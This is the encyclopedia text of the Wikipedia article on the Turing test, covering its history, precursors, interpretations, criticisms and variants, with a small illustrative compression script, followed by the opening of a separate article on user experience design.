Weizenbaum created a program called ELIZA, which mimicked a Rogerian psychotherapist. The program would search the user's sentence for keywords before repeating them back to the user, providing the impression of a program listening and paying attention.[15] Weizenbaum thus succeeded by designing a context where a chatbot could mimic a person despite "knowing almost nothing of the real world".[13] Weizenbaum's program was able to fool some people into believing that they were talking to a real person.[13] Kenneth Colby created PARRY in 1972, a program modeled after the behaviour of paranoid schizophrenics.[16] Psychiatrists asked to compare transcripts of conversations generated by the program to those of conversations by actual schizophrenics could only identify about 52 percent of cases correctly (a figure consistent with random guessing).[17] In 2001, three programmers developed Eugene Goostman, a chatbot portraying itself as a 13-year-old boy from Odesa who spoke English as a second language. This background was intentionally chosen so judges would forgive mistakes by the program.
In a competition, 33% of judges thought Goostman was human.[18][19][20] In June 2022, Google's LaMDA model received widespread coverage after claims that it had achieved sentience. Initially, in an article in The Economist, Google Research Fellow Blaise Agüera y Arcas said the chatbot had demonstrated a degree of understanding of social relationships.[21] Several days later, Google engineer Blake Lemoine claimed in an interview with the Washington Post that LaMDA had achieved sentience. Lemoine was placed on leave by Google for internal assertions to this effect. Google investigated the claims but dismissed them.[22][23] OpenAI's chatbot ChatGPT, released in November 2022, is based on the GPT-3.5 and GPT-4 large language models. Celeste Biever wrote in a Nature article that "ChatGPT broke the Turing test".[24] Stanford researchers reported that ChatGPT passes the test; they found that ChatGPT-4 "passes a rigorous Turing test, diverging from average human behavior chiefly to be more cooperative",[9] making it the first computer program to successfully do so.[10] In late March 2025, a study evaluated four systems (ELIZA, GPT-4o, LLaMa-3.1-405B, and GPT-4.5) in two randomized, controlled, and pre-registered Turing tests with independent participant groups. Participants engaged in simultaneous five-minute conversations with another human participant and one of these systems, then judged which conversational partner they believed to be human. When instructed to adopt a humanlike persona, GPT-4.5 was identified as the human 73% of the time, significantly more often than the actual human participants. LLaMa-3.1, under the same conditions, was judged to be human 56% of the time, not significantly more or less often than the humans it was compared to. Baseline models (ELIZA and GPT-4o) achieved win rates significantly below chance (23% and 21%, respectively). These results provide the first empirical evidence that an artificial system passes a standard three-party Turing test. The findings have implications for debates about the nature of intelligence exhibited by large language models (LLMs) and the social and economic impacts these systems are likely to have.[11] The question of whether it is possible for machines to think has a long history, which is firmly entrenched in the distinction between dualist and materialist views of the mind. René Descartes prefigures aspects of the Turing test in his 1637 Discourse on the Method when he writes: [H]ow many different automata or moving machines could be made by the industry of man ... For we can easily understand a machine's being constituted so that it can utter words, and even emit some responses to action on it of a corporeal kind, which brings about a change in its organs; for instance, if touched in a particular part it may ask what we wish to say to it; if in another part it may exclaim that it is being hurt, and so on. But it never happens that it arranges its speech in various ways, in order to reply appropriately to everything that may be said in its presence, as even the lowest type of man can do.[25] Here Descartes notes that automata are capable of responding to human interactions but argues that such automata cannot respond appropriately to things said in their presence in the way that any human can. Descartes therefore prefigures the Turing test by defining the insufficiency of appropriate linguistic response as that which separates the human from the automaton.
Descartes fails to consider the possibility that future automata might be able to overcome such insufficiency, and so does not propose the Turing test as such, even if he prefigures its conceptual framework and criterion. Denis Diderot formulated a Turing-test-like criterion in his 1746 book Pensées philosophiques, though with the important implicit limiting assumption that the participants are natural living beings rather than created artifacts: If they find a parrot who could answer to everything, I would claim it to be an intelligent being without hesitation. This does not mean he agreed with this, but that it was already a common argument of materialists at that time. According to dualism, the mind is non-physical (or, at the very least, has non-physical properties)[26] and, therefore, cannot be explained in purely physical terms. According to materialism, the mind can be explained physically, which leaves open the possibility of minds that are produced artificially.[27] In 1936, philosopher Alfred Ayer considered the standard philosophical question of other minds: how do we know that other people have the same conscious experiences that we do? In his book Language, Truth and Logic, Ayer suggested a protocol to distinguish between a conscious man and an unconscious machine: "The only ground I can have for asserting that an object which appears to be conscious is not really a conscious being, but only a dummy or a machine, is that it fails to satisfy one of the empirical tests by which the presence or absence of consciousness is determined".[28] (This suggestion is very similar to the Turing test, but it is not certain that Ayer's popular philosophical classic was familiar to Turing.) In other words, a thing is not conscious if it fails the consciousness test. A rudimentary idea of the Turing test appears in the 1726 novel Gulliver's Travels by Jonathan Swift.[29][30] When Gulliver is brought before the king of Brobdingnag, the king thinks at first that Gulliver might be "a piece of clock-work (which is in that country arrived to a very great perfection) contrived by some ingenious artist". Even when he hears Gulliver speaking, the king still doubts whether Gulliver was taught "a set of words" to make him "sell at a better price". Gulliver relates that only after "he put several other questions to me, and still received rational answers" did the king become satisfied that Gulliver was not a machine.[31] Tests where a human judges whether a computer or an alien is intelligent were an established convention in science fiction by the 1940s, and it is likely that Turing would have been aware of them.[32] Stanley G. Weinbaum's "A Martian Odyssey" (1934) provides an example of how nuanced such tests could be.[32] Earlier examples of machines or automatons attempting to pass as human include the Ancient Greek myth of Pygmalion, who creates a sculpture of a woman that is animated by Aphrodite; Carlo Collodi's novel The Adventures of Pinocchio, about a puppet who wants to become a real boy; and E. T. A. Hoffmann's 1816 story "The Sandman", in which the protagonist falls in love with an automaton.
In all these examples, people are fooled by artificial beings that, up to a point, pass as human.[33] Researchers in the United Kingdom had been exploring "machine intelligence" for up to ten years prior to the founding of the field of artificial intelligence (AI) research in 1956.[34] It was a common topic among the members of the Ratio Club, an informal group of British cybernetics and electronics researchers that included Alan Turing.[35] Turing, in particular, had been pursuing the notion of machine intelligence since at least 1941,[36] and one of the earliest known mentions of "computer intelligence" was made by him in 1947.[37] In Turing's report "Intelligent Machinery",[38] he investigated "the question of whether or not it is possible for machinery to show intelligent behaviour"[39] and, as part of that investigation, proposed what may be considered the forerunner to his later tests: It is not difficult to devise a paper machine which will play a not very bad game of chess.[40] Now get three men A, B and C as subjects for the experiment. A and C are to be rather poor chess players, B is the operator who works the paper machine. ... Two rooms are used with some arrangement for communicating moves, and a game is played between C and either A or the paper machine. C may find it quite difficult to tell which he is playing.[41] "Computing Machinery and Intelligence" (1950) was the first published paper by Turing to focus exclusively on machine intelligence. Turing begins the 1950 paper with the claim, "I propose to consider the question 'Can machines think?'"[5] As he highlights, the traditional approach to such a question is to start with definitions, defining both the terms "machine" and "think". Turing chooses not to do so; instead, he replaces the question with a new one, "which is closely related to it and is expressed in relatively unambiguous words".[5] In essence he proposes to change the question from "Can machines think?" to "Can machines do what we (as thinking entities) can do?"[42] The advantage of the new question, Turing argues, is that it draws "a fairly sharp line between the physical and intellectual capacities of a man".[43] To demonstrate this approach, Turing proposes a test inspired by a party game known as the "imitation game", in which a man and a woman go into separate rooms and guests try to tell them apart by writing a series of questions and reading the typewritten answers sent back. In this game, both the man and the woman aim to convince the guests that they are the other. (Huma Shah argues that this two-human version of the game was presented by Turing only to introduce the reader to the machine-human question-answer test.[44]) Turing described his new version of the game as follows: We now ask the question, "What will happen when a machine takes the part of A in this game?" Will the interrogator decide wrongly as often when the game is played like this as he does when the game is played between a man and a woman? These questions replace our original, "Can machines think?"[43] Later in the paper, Turing suggests an "equivalent" alternative formulation involving a judge conversing only with a computer and a man.[45] While neither of these formulations precisely matches the version of the Turing test that is more generally known today, he proposed a third in 1952.
In this version, which Turing discussed in a BBC radio broadcast, a jury asks questions of a computer, and the role of the computer is to make a significant proportion of the jury believe that it is really a man.[46] Turing's paper considered nine putative objections, which include some of the major arguments against artificial intelligence that have been raised in the years since the paper was published (see "Computing Machinery and Intelligence").[6] John Searle's 1980 paper Minds, Brains, and Programs proposed the "Chinese room" thought experiment and argued that the Turing test could not be used to determine if a machine could think. Searle noted that software (such as ELIZA) could pass the Turing test simply by manipulating symbols of which it had no understanding. Without understanding, it could not be described as "thinking" in the same sense people do. Therefore, Searle concluded, the Turing test could not prove that machines could think.[47] Much like the Turing test itself, Searle's argument has been both widely criticised[48] and endorsed.[49] Arguments such as Searle's and others working on the philosophy of mind sparked off a more intense debate about the nature of intelligence, the possibility of machines with a conscious mind, and the value of the Turing test that continued through the 1980s and 1990s.[50] The Loebner Prize, now reported as defunct,[51] provided an annual platform for practical Turing tests, with the first competition held in November 1991.[52] It was underwritten by Hugh Loebner. The Cambridge Center for Behavioral Studies in Massachusetts, United States, organised the prizes up to and including the 2003 contest. As Loebner described it, one reason the competition was created was to advance the state of AI research, at least in part because no one had taken steps to implement the Turing test despite 40 years of discussing it.[53] The first Loebner Prize competition in 1991 led to a renewed discussion of the viability of the Turing test and the value of pursuing it, in both the popular press[54] and academia.[55] The first contest was won by a mindless program with no identifiable intelligence that managed to fool naïve interrogators into making the wrong identification. This highlighted several of the shortcomings of the Turing test (discussed below): the winner won, at least in part, because it was able to "imitate human typing errors";[54] the unsophisticated interrogators were easily fooled;[55] and some researchers in AI came to feel that the test is merely a distraction from more fruitful research.[56] The silver (text only) and gold (audio and visual) prizes were never won. However, the competition awarded the bronze medal every year for the computer system that, in the judges' opinions, demonstrated the "most human" conversational behaviour among that year's entries. Artificial Linguistic Internet Computer Entity (A.L.I.C.E.) won the bronze award on three occasions (2000, 2001, 2004). The learning AI Jabberwacky won in 2005 and 2006. The Loebner Prize tested conversational intelligence; winners were typically chatterbot programs, or Artificial Conversational Entities (ACEs). Early Loebner Prize rules restricted conversations: each entry and hidden human conversed on a single topic,[57] so the interrogators were restricted to one line of questioning per entity interaction. The restricted-conversation rule was lifted for the 1995 Loebner Prize. Interaction duration between judge and entity has varied across Loebner Prizes.
In Loebner 2003, at the University of Surrey, each interrogator was allowed five minutes to interact with an entity, machine or hidden human. Between 2004 and 2007, the interaction time allowed in Loebner Prizes was more than twenty minutes. The final competition was held in 2019, due to a lack of funding for the prize following Loebner's death in 2016.[58] CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) applies one of the oldest concepts in artificial intelligence: it is based on the Turing test and is commonly used online to tell humans and bots apart. Displaying distorted letters and numbers, it asks the user to identify the letters and numbers and type them into a field, which bots struggle to do.[18][59] reCAPTCHA is a CAPTCHA system owned by Google. reCAPTCHA v1 and v2 both operated by asking the user to match distorted pictures or identify distorted letters and numbers. reCAPTCHA v3 is designed not to interrupt users and runs automatically when pages are loaded or buttons are clicked. This "invisible" CAPTCHA verification happens in the background, and no challenges appear, which filters out most basic bots.[60][61] Saul Traiger argues that there are at least three primary versions of the Turing test, two of which are offered in "Computing Machinery and Intelligence" and one that he describes as the "Standard Interpretation".[62] While there is some debate regarding whether the "Standard Interpretation" is that described by Turing or, instead, based on a misreading of his paper, these three versions are not regarded as equivalent,[62] and their strengths and weaknesses are distinct.[63] Turing's original article describes a simple party game involving three players. Player A is a man, player B is a woman, and player C (who plays the role of the interrogator) is of either gender. In the imitation game, player C is unable to see either player A or player B, and can communicate with them only through written notes. By asking questions of player A and player B, player C tries to determine which of the two is the man and which is the woman. Player A's role is to trick the interrogator into making the wrong decision, while player B attempts to assist the interrogator in making the right one.[7] Turing then asks: "What will happen when a machine takes the part of A in this game? Will the interrogator decide wrongly as often when the game is played like this as he does when the game is played between a man and a woman?" These questions replace our original, "Can machines think?"[43] The second version appeared later in Turing's 1950 paper. As in the original imitation game, the role of player A is performed by a computer; however, the role of player B is performed by a man rather than a woman. Let us fix our attention on one particular digital computer C. Is it true that by modifying this computer to have an adequate storage, suitably increasing its speed of action, and providing it with an appropriate programme, C can be made to play satisfactorily the part of A in the imitation game, the part of B being taken by a man?[43] In this version, both player A (the computer) and player B are trying to trick the interrogator into making an incorrect decision. The standard interpretation is not included in the original paper, but is both accepted and debated.
Common understanding has it that the purpose of the Turing test is not specifically to determine whether a computer is able to fool an interrogator into believing that it is a human, but rather whether a computer could imitate a human.[7] While there is some dispute whether this interpretation was intended by Turing, Sterrett believes that it was[64] and thus conflates the second version with this one, while others, such as Traiger, do not[62] – this has nevertheless led to what can be viewed as the "standard interpretation". In this version, player A is a computer and player B a person of either sex. The role of the interrogator is not to determine which is male and which is female, but which is a computer and which is a human.[65] The fundamental issue with the standard interpretation is that the interrogator cannot differentiate which responder is human and which is machine. There are issues about duration, but the standard interpretation generally treats this limitation as something that should be reasonable. Controversy has arisen over which of the alternative formulations of the test Turing intended.[64] Sterrett argues that two distinct tests can be extracted from his 1950 paper and that, pace Turing's remark, they are not equivalent. The test that employs the party game and compares frequencies of success is referred to as the "Original Imitation Game Test", whereas the test consisting of a human judge conversing with a human and a machine is referred to as the "Standard Turing Test"; note that Sterrett equates this with the "standard interpretation" rather than with the second version of the imitation game. Sterrett agrees that the standard Turing test (STT) has the problems that its critics cite, but feels that, in contrast, the original imitation game test (OIG test) so defined is immune to many of them, due to a crucial difference: unlike the STT, it does not make similarity to human performance the criterion, even though it employs human performance in setting a criterion for machine intelligence. A man can fail the OIG test, but it is argued that it is a virtue of a test of intelligence that failure indicates a lack of resourcefulness: the OIG test requires the resourcefulness associated with intelligence and not merely "simulation of human conversational behaviour". The general structure of the OIG test could even be used with non-verbal versions of imitation games.[66] According to Huma Shah, Turing himself was concerned with whether a machine could think and was providing a simple method to examine this: through human-machine question-answer sessions.[67] Shah argues that the imitation game which Turing described could be put into practice in two different ways: a) a one-to-one interrogator-machine test, and b) a simultaneous comparison of a machine with a human, both questioned in parallel by an interrogator.[44] Still other writers[68] have interpreted Turing as proposing that the imitation game itself is the test, without specifying how to take into account Turing's statement that the test he proposed using the party version of the imitation game is based upon a criterion of comparative frequency of success in that imitation game, rather than a capacity to succeed at one round of the game. Some writers argue that the imitation game is best understood by its social aspects.
In his 1948 paper, Turing refers to intelligence as an "emotional concept", and notes: "The extent to which we regard something as behaving in an intelligent manner is determined as much by our own state of mind and training as by the properties of the object under consideration. If we are able to explain and predict its behaviour or if there seems to be little underlying plan, we have little temptation to imagine intelligence. With the same object therefore it is possible that one man would consider it as intelligent and another would not; the second man would have found out the rules of its behaviour."[69] Following this remark and similar ones scattered throughout Turing's publications, Diane Proudfoot[70] claims that Turing held a response-dependence approach to intelligence, according to which an intelligent (or thinking) entity is one that appears intelligent to an average interrogator. Shlomo Danziger[71] promotes a socio-technological interpretation, according to which Turing saw the imitation game not as an intelligence test but as a technological aspiration – one whose realization would likely involve a change in society's attitude toward machines. According to this reading, Turing's celebrated 50-year prediction – that by the end of the 20th century his test would be passed by some machine – actually consists of two distinguishable predictions. The first is a technological prediction: "I believe that in about fifty years' time it will be possible to programme computers ... to make them play the imitation game so well that an average interrogator will not have more than 70% chance of making the right identification after five minutes of questioning."[72] The second prediction Turing makes is a sociological one: "I believe that at the end of the century the use of words and general educated opinion will have altered so much that one will be able to speak of machines thinking without expecting to be contradicted."[72] Danziger claims further that for Turing, alteration of society's attitude towards machinery is a prerequisite for the existence of intelligent machines: only when the term "intelligent machine" is no longer seen as an oxymoron would the existence of intelligent machines become logically possible. Saygin has suggested that maybe the original game is a way of proposing a less biased experimental design, as it hides the participation of the computer.[73] The imitation game also includes a "social hack" not found in the standard interpretation, as in that game both the computer and the male human are required to pretend to be someone they are not.[74] A crucial piece of any laboratory test is that there should be a control. Turing never makes clear whether the interrogator in his tests is aware that one of the participants is a computer.
He states only that player A is to be replaced with a machine, not that player C is to be made aware of this replacement.[43] When Colby, FD Hilf, S Weber and AD Kramer tested PARRY, they did so by assuming that the interrogators did not need to know that one or more of those being interviewed was a computer during the interrogation.[75] As Ayse Saygin, Peter Swirski,[76] and others have highlighted, this makes a big difference to the implementation and outcome of the test.[7] In an experimental study looking at Gricean maxim violations using transcripts of Loebner's one-to-one (interrogator-hidden interlocutor) Prize for AI contests between 1994 and 1999, Ayse Saygin found significant differences between the responses of participants who knew and did not know about computers being involved.[77] The power and appeal of the Turing test derives from its simplicity. The philosophy of mind, psychology, and modern neuroscience have been unable to provide definitions of "intelligence" and "thinking" that are sufficiently precise and general to be applied to machines. Without such definitions, the central questions of the philosophy of artificial intelligence cannot be answered. The Turing test, even if imperfect, at least provides something that can actually be measured. As such, it is a pragmatic attempt to answer a difficult philosophical question. The format of the test allows the interrogator to give the machine a wide variety of intellectual tasks. Turing wrote that "the question and answer method seems to be suitable for introducing almost any one of the fields of human endeavour that we wish to include".[78] John Haugeland adds that "understanding the words is not enough; you have to understand the topic as well".[79] To pass a well-designed Turing test, the machine must use natural language, reason, have knowledge and learn. The test can be extended to include video input, as well as a "hatch" through which objects can be passed: this would force the machine to demonstrate skilled use of well-designed vision and robotics as well. Together, these represent almost all of the major problems that artificial intelligence research would like to solve.[80] The Feigenbaum test is designed to take advantage of the broad range of topics available to a Turing test. It is a limited form of Turing's question-answer game which compares the machine against the abilities of experts in specific fields such as literature or chemistry. As a Cambridge honours graduate in mathematics, Turing might have been expected to propose a test of computer intelligence requiring expert knowledge in some highly technical field, thus anticipating a more recent approach to the subject. Instead, as already noted, the test which he described in his seminal 1950 paper requires the computer to be able to compete successfully in a common party game, and this by performing as well as the typical man in answering a series of questions so as to pretend convincingly to be the woman contestant. Given the status of human sexual dimorphism as one of the most ancient of subjects, it is thus implicit in the above scenario that the questions to be answered will involve neither specialised factual knowledge nor information-processing technique.
The challenge for the computer, rather, will be to demonstrate empathy for the role of the female, and to demonstrate as well a characteristic aesthetic sensibility – both of which qualities are on display in the snippet of dialogue which Turing imagined. When Turing does introduce some specialised knowledge into one of his imagined dialogues, the subject is not maths or electronics, but poetry. Turing thus once again demonstrates his interest in empathy and aesthetic sensitivity as components of an artificial intelligence; and in light of an increasing awareness of the threat from an AI run amok,[81] it has been suggested[82] that this focus perhaps represents a critical intuition on Turing's part, i.e., that emotional and aesthetic intelligence will play a key role in the creation of a "friendly AI". It is further noted, however, that whatever inspiration Turing might be able to lend in this direction depends upon the preservation of his original vision, which is to say, further, that the promulgation of a "standard interpretation" of the Turing test – i.e., one which focuses on a discursive intelligence only – must be regarded with some caution. Turing did not explicitly state that the Turing test could be used as a measure of "intelligence", or any other human quality. He wanted to provide a clear and understandable alternative to the word "think", which he could then use to reply to criticisms of the possibility of "thinking machines" and to suggest ways that research might move forward. Nevertheless, the Turing test has been proposed as a measure of a machine's "ability to think" or its "intelligence". This proposal has received criticism from both philosophers and computer scientists. The interpretation assumes that an interrogator can determine if a machine is "thinking" by comparing its behaviour with human behaviour. Every element of this assumption has been questioned: the reliability of the interrogator's judgement, the value of comparing the machine with a human, and the value of comparing only behaviour. Because of these and other considerations, some AI researchers have questioned the relevance of the test to their field. In practice, the test's results can easily be dominated not by the computer's intelligence, but by the attitudes, skill, or naïveté of the questioner. Numerous experts in the field, including cognitive scientist Gary Marcus, insist that the Turing test only shows how easy it is to fool humans and is not an indication of machine intelligence.[83] Turing does not specify the precise skills and knowledge required by the interrogator in his description of the test, but he did use the term "average interrogator": "[the] average interrogator would not have more than 70 per cent chance of making the right identification after five minutes of questioning".[72] Chatterbot programs such as ELIZA have repeatedly fooled unsuspecting people into believing that they are communicating with human beings. In these cases, the "interrogators" are not even aware of the possibility that they are interacting with computers. To successfully appear human, there is no need for the machine to have any intelligence whatsoever; only a superficial resemblance to human behaviour is required. Early Loebner Prize competitions used "unsophisticated" interrogators who were easily fooled by the machines.[55] Since 2004, the Loebner Prize organisers have deployed philosophers, computer scientists, and journalists among the interrogators.
Nonetheless, some of these experts have been deceived by the machines.[84] One interesting feature of the Turing test is the frequency of the confederate effect, when the confederate (tested) humans are misidentified by the interrogators as machines. It has been suggested that what interrogators expect as human responses is not necessarily typical of humans. As a result, some individuals can be categorised as machines, which can work in favour of a competing machine. The humans are instructed to "act themselves", but sometimes their answers are more like what the interrogator expects a machine to say.[85] This raises the question of how to ensure that the humans are motivated to "act human". The Turing test does not directly test whether the computer behaves intelligently. It tests only whether the computer behaves like a human being. Since human behaviour and intelligent behaviour are not exactly the same thing, the test can fail to accurately measure intelligence in two ways: some human behaviour is unintelligent, yet the machine must imitate it to pass, and some intelligent behaviour is inhuman, yet exhibiting it would cause the machine to fail. The Turing test is concerned strictly with how the subject acts – the external behaviour of the machine. In this regard, it takes a behaviourist or functionalist approach to the study of the mind. The example of ELIZA suggests that a machine passing the test may be able to simulate human conversational behaviour by following a simple (but large) list of mechanical rules, without thinking or having a mind at all. John Searle has argued that external behaviour cannot be used to determine if a machine is "actually" thinking or merely "simulating thinking".[47] His Chinese room argument is intended to show that, even if the Turing test is a good operational definition of intelligence, it may not indicate that the machine has a mind, consciousness, or intentionality. (Intentionality is a philosophical term for the power of thoughts to be "about" something.) Turing anticipated this line of criticism in his original paper,[89] writing: "I do not wish to give the impression that I think there is no mystery about consciousness. There is, for instance, something of a paradox connected with any attempt to localise it. But I do not think these mysteries necessarily need to be solved before we can answer the question with which we are concerned in this paper."[90] Mainstream AI researchers argue that trying to pass the Turing test is merely a distraction from more fruitful research.[56] Indeed, the Turing test is not an active focus of much academic or commercial effort – as Stuart Russell and Peter Norvig write: "AI researchers have devoted little attention to passing the Turing test".[91] There are several reasons. First, there are easier ways to test their programs. Most current research in AI-related fields is aimed at modest and specific goals, such as object recognition or logistics. To test the intelligence of the programs that solve these problems, AI researchers simply give them the task directly. Stuart Russell and Peter Norvig suggest an analogy with the history of flight: planes are tested by how well they fly, not by comparing them to birds. "Aeronautical engineering texts," they write, "do not define the goal of their field as 'making machines that fly so exactly like pigeons that they can fool other pigeons.'"[91] Second, creating lifelike simulations of human beings is a difficult problem on its own that does not need to be solved to achieve the basic goals of AI research.
Believable human characters may be interesting in a work of art, a game, or a sophisticated user interface, but they are not part of the science of creating intelligent machines, that is, machines that solve problems using intelligence. Turing did not intend for his idea to be used to test the intelligence of programs – he wanted to provide a clear and understandable example to aid in the discussion of the philosophy of artificial intelligence.[92] John McCarthy argues that we should not be surprised that a philosophical idea turns out to be useless for practical applications. He observes that the philosophy of AI is "unlikely to have any more effect on the practice of AI research than philosophy of science generally has on the practice of science".[93][94] Another well-known objection to the Turing test concerns its exclusive focus on linguistic behaviour (i.e., it is only a "language-based" experiment, while all the other cognitive faculties are not tested). This drawback downplays the role of the other modality-specific "intelligent abilities" of human beings that the psychologist Howard Gardner, in his "multiple intelligence theory", proposes to consider (verbal-linguistic abilities being only one of them).[95] A critical aspect of the Turing test is that a machine must give itself away as being a machine by its utterances. An interrogator must then make the "right identification" by correctly identifying the machine as being just that. If, however, a machine remains silent during a conversation, then it is not possible for an interrogator to accurately identify the machine other than by means of a calculated guess.[96] Even taking into account a parallel/hidden human as part of the test may not help the situation, as humans can often be misidentified as being a machine.[97] By focusing on imitating humans, rather than augmenting or extending human capabilities, the Turing test risks directing research and implementation toward technologies that substitute for humans and thereby drive down wages and income for workers. As they lose economic power, these workers may also lose political power, making it more difficult for them to change the allocation of wealth and income. This can trap them in a bad equilibrium. Erik Brynjolfsson has called this "The Turing Trap"[98] and argued that there are currently excess incentives for creating machines that imitate rather than augment humans. Numerous other versions of the Turing test, including those expounded above, have been raised through the years. A modification of the Turing test wherein the objective of one or more of the roles has been reversed between machines and humans is termed a reverse Turing test. An example is implied in the work of psychoanalyst Wilfred Bion,[99] who was particularly fascinated by the "storm" that resulted from the encounter of one mind by another. In his 2000 book,[76] among several other original points with regard to the Turing test, literary scholar Peter Swirski discussed in detail the idea of what he termed the Swirski test – essentially the reverse Turing test. He pointed out that it overcomes most if not all standard objections levelled at the standard version. Carrying this idea forward, R. D. Hinshelwood[100] described the mind as a "mind-recognizing apparatus". The challenge would be for the computer to be able to determine if it were interacting with a human or another computer.
This is an extension of the original question that Turing attempted to answer, but would, perhaps, offer a high enough standard to define a machine that could "think" in a way that we typically define as characteristically human. CAPTCHA is a form of reverse Turing test. Before being allowed to perform some action on a website, the user is presented with alphanumerical characters in a distorted graphic image and asked to type them out. This is intended to prevent automated systems from being used to abuse the site. The rationale is that software sufficiently sophisticated to read and reproduce the distorted image accurately does not exist (or is not available to the average user), so any system able to do so is likely to be a human. Software that could reverse CAPTCHA with some accuracy by analysing patterns in the generating engine started being developed soon after the creation of CAPTCHA.[101] In 2013, researchers at Vicarious announced that they had developed a system to solve CAPTCHA challenges from Google, Yahoo!, and PayPal up to 90% of the time.[102] In 2014, Google engineers demonstrated a system that could defeat CAPTCHA challenges with 99.8% accuracy.[103] In 2015, Shuman Ghosemajumder, former click fraud czar of Google, stated that there were cybercriminal sites that would defeat CAPTCHA challenges for a fee, to enable various forms of fraud.[104] A further variation is motivated by the concern that modern natural language processing models have proved highly successful at generating text on the basis of a huge text corpus and could eventually pass the Turing test simply by manipulating words and sentences that were used in the initial training of the model. Since the interrogator has no precise understanding of the training data, the model might simply be returning sentences that exist in similar fashion in the enormous amount of training data. For this reason, Arthur Schwaninger proposes a variation of the Turing test that can distinguish between systems that are only capable of using language and systems that understand language. He proposes a test in which the machine is confronted with philosophical questions that do not depend on any prior knowledge and yet require self-reflection to be answered appropriately.[105] Another variation is described as the subject-matter expert Turing test, where a machine's response cannot be distinguished from that of an expert in a given field. This is also known as a "Feigenbaum test" and was proposed by Edward Feigenbaum in a 2003 paper.[106] Robert French (1990) makes the case that an interrogator can distinguish human and non-human interlocutors by posing questions that reveal the low-level (i.e., unconscious) processes of human cognition, as studied by cognitive science. Such questions reveal the precise details of the human embodiment of thought and can unmask a computer unless it experiences the world as humans do.[107] The "Total Turing test"[3] variation of the Turing test, proposed by cognitive scientist Stevan Harnad,[108] adds two further requirements to the traditional Turing test: the interrogator can also test the perceptual abilities of the subject (requiring computer vision) and the subject's ability to manipulate objects (requiring robotics).[109] A letter published in Communications of the ACM[110] describes the concept of generating a synthetic patient population and proposes a variation of the Turing test to assess the difference between synthetic and real patients.
The letter states: "In the EHR context, though a human physician can readily distinguish between synthetically generated and real live human patients, could a machine be given the intelligence to make such a determination on its own?" and further: "Before synthetic patient identities become a public health problem, the legitimate EHR market might benefit from applying Turing Test-like techniques to ensure greater data reliability and diagnostic value. Any new techniques must thus consider patients' heterogeneity and are likely to have greater complexity than the Allen eighth-grade-science-test is able to grade". The minimum intelligent signal test was proposed by Chris McKinstry as "the maximum abstraction of the Turing test",[111] in which only binary responses (true/false or yes/no) are permitted, to focus only on the capacity for thought. It eliminates text chat problems like anthropomorphism bias, and does not require emulation of unintelligent human behaviour, allowing for systems that exceed human intelligence. The questions must each stand on their own, however, making it more like an IQ test than an interrogation. It is typically used to gather statistical data against which the performance of artificial intelligence programs may be measured.[112] The organisers of the Hutter Prize believe that compressing natural language text is a hard AI problem, equivalent to passing the Turing test (a toy sketch of this compression-as-intelligence premise appears below). The data compression test has been argued to have both advantages and disadvantages compared with most versions and variations of a Turing test.[citation needed] A related approach, which appeared much earlier in the late 1990s, is the inclusion of compression problems in an extended Turing test,[113] or tests which are completely derived from Kolmogorov complexity.[114] Other related tests in this line are presented by Hernandez-Orallo and Dowe.[115] Algorithmic IQ, or AIQ for short, is an attempt to convert the theoretical Universal Intelligence Measure of Legg and Hutter (based on Solomonoff's inductive inference) into a working practical test of machine intelligence.[116] Two major advantages of some of these tests are their applicability to nonhuman intelligences and their absence of a requirement for human testers. The Turing test inspired the Ebert test, proposed in 2011 by film critic Roger Ebert, which tests whether a computer-based synthesised voice has sufficient skill in terms of intonations, inflections, timing and so forth to make people laugh.[117] Taking advantage of large language models, in 2023 the research company AI21 Labs created an online social experiment titled "Human or Not?".[118][119] It was played more than 10 million times by more than 2 million people,[120] making it the biggest Turing-style experiment to that date. The results showed that 32% of people could not distinguish between humans and machines.[121][122] 1990 marked the fortieth anniversary of the first publication of Turing's "Computing Machinery and Intelligence" paper and saw renewed interest in the test. Two significant events occurred in that year: the first was the Turing Colloquium, held at the University of Sussex in April, which brought together academics and researchers from a wide variety of disciplines to discuss the Turing test in terms of its past, present, and future; the second was the formation of the annual Loebner Prize competition.
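Returning to the Hutter Prize idea mentioned above: the premise is that better models of text compress it further, so compressed size can serve as a crude proxy for how well a system captures the text's regularities. The following is a purely illustrative toy sketch, not the Hutter Prize's actual methodology or scoring, using Python's standard zlib and bz2 modules on a stand-in corpus.

```python
import bz2
import zlib

# Any natural-language corpus would do; this repeated passage is just a stand-in.
corpus = ("No, I never could have done it, but the fact is I didn't mean "
          "it for poetry. " * 200).encode("utf-8")

def report(name: str, compressed: bytes, original: bytes) -> None:
    """Print the compressed size and ratio for one compressor."""
    ratio = len(compressed) / len(original)
    print(f"{name:>4}: {len(compressed):6d} bytes ({ratio:.1%} of original)")

# A compressor that captures more of the text's structure produces a smaller
# output; under the compression-as-intelligence premise, it "understands" more.
report("zlib", zlib.compress(corpus, level=9), corpus)
report("bz2", bz2.compress(corpus, compresslevel=9), corpus)
```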
Blay Whitby lists four major turning points in the history of the Turing test – the publication of "Computing Machinery and Intelligence" in 1950, the announcement of Joseph Weizenbaum's ELIZA in 1966, Kenneth Colby's creation of PARRY, which was first described in 1972, and the Turing Colloquium in 1990.[123] In parallel to the 2008 Loebner Prize held at the University of Reading,[124] the Society for the Study of Artificial Intelligence and the Simulation of Behaviour (AISB) hosted a one-day symposium to discuss the Turing test, organised by John Barnden, Mark Bishop, Huma Shah and Kevin Warwick.[125] The speakers included the Royal Institution's Director Baroness Susan Greenfield, Selmer Bringsjord, Turing's biographer Andrew Hodges, and consciousness scientist Owen Holland. No agreement emerged for a canonical Turing test, though Bringsjord expressed that a sizeable prize would result in the Turing test being passed sooner.
https://en.wikipedia.org/wiki/Turing_test
User experience design (UX design, UXD, UED, or XD) defines the experience a user goes through when interacting with a company, its services, and its products.[1] User experience design is a user-centered design approach because it considers the user's experience when using a product or platform.[2] Research, data analysis, and test results drive design decisions in UX design rather than aesthetic preferences and opinions, a practice known as UX design research. Unlike user interface design, which focuses solely on the design of a computer interface, UX design encompasses all aspects of a user's perceived experience with a product or website, such as its usability, usefulness, desirability, brand perception, and overall performance. UX design is also an element of the customer experience (CX), and encompasses all design aspects and design stages that surround a customer's experience.[3] User experience design is a conceptual design discipline rooted in human factors and ergonomics. This field, since the late 1940s, has focused on the interaction between human users, machines, and contextual environments to design systems that address the user's experience.[4] User experience became an explicit concern for designers in the early 1990s with the proliferation of workplace computers. Don Norman, a professor and researcher in design, usability, and cognitive science, coined the term "user experience" and brought it to a wider audience:[5] "I invented the term because I thought human interface and usability were too narrow. I wanted to cover all aspects of the person's experience with the system including industrial design graphics, the interface, the physical interaction and the 